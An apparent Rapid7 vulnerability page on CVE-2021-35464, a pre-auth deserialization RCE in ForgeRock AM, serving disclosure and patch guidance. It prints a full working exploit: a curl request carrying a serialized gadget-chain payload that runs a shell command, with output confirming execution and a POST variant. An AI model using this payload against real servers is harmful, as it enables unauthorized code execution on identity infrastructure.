Attacker Value
Very High
Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)
Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)
(Last updated October 07, 2023) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Metasploit Module
Description
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier
Add Assessment
1
Technical Analysis
Trivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises—patch quickly. Shout-out to Portswigger for their excellent write-up: https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
Update July 12, 2021: We now have reliable private reports of exploitation in the wild.
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- forgerock
Products
- am,
- openam
Metasploit Modules
Exploited in the Wild
References
Technical Analysis
Threat status: Threat – we now have reliable private reports of exploitation in the wild.
Attacker utility: Remote code execution
Vulnerability class: Deserialization
Description
On Tuesday, June 29, 2021, Portswigger security researcher Michael Stepankin published details on CVE-2021-35464, a pre-authentication remote code execution vulnerability in ForgeRock’s AM identity and access management solution. The vulnerability arises from a Java deserialization flaw in AM’s implementation of the JATO framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system, and public proofs-of-concept are readily available.
ForgeRock AM versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform’s OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.
Affected products
AM 6.0.0.x
AM 6.5.0.x
6.5.1
6.5.2.x
6.5.3
Guidance
According to the guidance in ForgeRock’s advisory, they are “actively working on patches” for existing versions of ForgeRock Access Manager as of June 29, 2021. Organizations must either upgrade to AM version 7 or above or apply one of several workarounds available—see the advisory for details.
Rapid7 analysis
We expect widespread exploitation to occur quickly. As of June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s AM solution. Rapid7 researchers could easily reproduce RCE against OpenAM using a touch /tmp/vulnerable payload:
wvu@kharak:~$ curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4" * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 7080 (#0) > GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4 HTTP/1.1 > Host: 127.0.0.1:7080 > User-Agent: curl/7.64.1 > Accept: */* > < HTTP/1.1 302 < X-Frame-Options: SAMEORIGIN < Cache-Control: private < Location: http://127.0.0.1:7080/openam/base/AMInvalidURL < Content-Length: 0 < Date: Tue, 29 Jun 2021 15:59:35 GMT < * Connection #0 to host 127.0.0.1 left intact * Closing connection 0 wvu@kharak:~$
openam@localhost:/tmp$ ls -l total 8 drwxr-x--- 2 openam root 4096 Jun 29 15:50 hsperfdata_openam drwxr-xr-x 1 root root 4096 Jun 17 00:46 hsperfdata_root -rw-r----- 1 openam root 0 Jun 29 15:59 vulnerable openam@localhost:/tmp$
Sending the payload in a POST request also works:
curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>
The ForgeRock AM “patch” (version 7) removes JATO and the legacy endpoints using it:
--- a/WEB-INF/web.xml +++ b/WEB-INF/web.xml @@ -45,88 +45,6 @@ <listener-class>org.forgerock.openam.identity.idm.AMIdentityRepositoryListenerInitializer</listener-class> </listener> - <!-- context param --> - <context-param> - <param-name>jato:enforceStrictSessionTimeout</param-name> - <param-value>true</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.authentication.UI.*:moduleURL</param-name> - <param-value>../UI</param-value> - </context-param> - <context-param> - <param-name>jato:enforceStrictSessionTimeout1</param-name> - <param-value>true</param-value> - </context-param> - - <!-- Console context params --> - <context-param> - <param-name>jato:com.sun.identity.console.base.*:moduleURL</param-name> - <param-value>../base</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.authentication.*:moduleURL</param-name> - <param-value>../authentication</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.service.*:moduleURL</param-name> - <param-value>../service</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.session.*:moduleURL</param-name> - <param-value>../session</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.realm.*:moduleURL</param-name> - <param-value>../realm</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.policy.*:moduleURL</param-name> - <param-value>../policy</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.idm.*:moduleURL</param-name> - <param-value>../idm</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.user.*:moduleURL</param-name> - <param-value>../user</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.delegation.*:moduleURL</param-name> - <param-value>../delegation</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.agentconfig.*:moduleURL</param-name> - <param-value>../agentconfig</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.task.*:moduleURL</param-name> - <param-value>../task</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.version.*:moduleURL</param-name> - <param-value>../ccversion</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.federation.*:moduleURL</param-name> - <param-value>../federation</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.webservices.*:moduleURL</param-name> - <param-value>../webservices</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.sts.*:moduleURL</param-name> - <param-value>../sts</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.audit.*:moduleURL</param-name> - <param-value>../audit</param-value> - </context-param> - - <!-- end console context param --> - <filter> <filter-name>amSetupFilter</filter-name> <filter-class>com.sun.identity.setup.AMSetupFilter</filter-class> @@ -141,6 +59,16 @@ <param-value>Server</param-value> </init-param> </filter> + <filter> + <filter-name>SecureCookieFilter</filter-name> + <filter-class>org.forgerock.openam.headers.SecureCookieFilter</filter-class> + <async-supported>true</async-supported> + <init-param> + <!-- Add any cookies that should be excluded from upgrade to secure cookies here --> + <param-name>excludes</param-name> + <param-value></param-value> + </init-param> + </filter> <!-- To override the default User-Agent exclusion patterns for SameSite=none cookies, uncomment the following filter definition and update the excluded patterns, one pattern per line --> @@ -191,6 +119,18 @@ <param-value>nosniff</param-value> </init-param> </filter> + <filter> + <filter-name>CachePrivate</filter-name> + <filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class> + <init-param> + <param-name>Cache-Control</param-name> + <param-value>private</param-value> + </init-param> + <init-param> + <param-name>excludes</param-name> + <param-value>/serverinfo/*,/serverinfo/version,/serverinfo/cookieDomains</param-value> + </init-param> + </filter> <filter> <filter-name>CacheForFiveMinutes</filter-name> <filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class> @@ -210,73 +150,9 @@ </init-param> <init-param> <param-name>excludes</param-name> - <param-value>/policyEditor/,/policyEditor/index.html,/scripts/,/scripts/index.html,/XUI/,/XUI/index.html</param-value> + <param-value>/XUI/,/XUI/index.html,/ui-admin/,/ui-admin/index.html</param-value> </init-param> </filter> - <!-- To configure CORS Support, please see the documentation and use the following lines as a template. - <filter> - <filter-name>CORSFilter</filter-name> - <filter-class>org.forgerock.openam.cors.CORSFilter</filter-class> - <init-param> - <description> - Accepted Methods (Required): - A comma separated list of HTTP methods for which to accept CORS requests. - </description> - 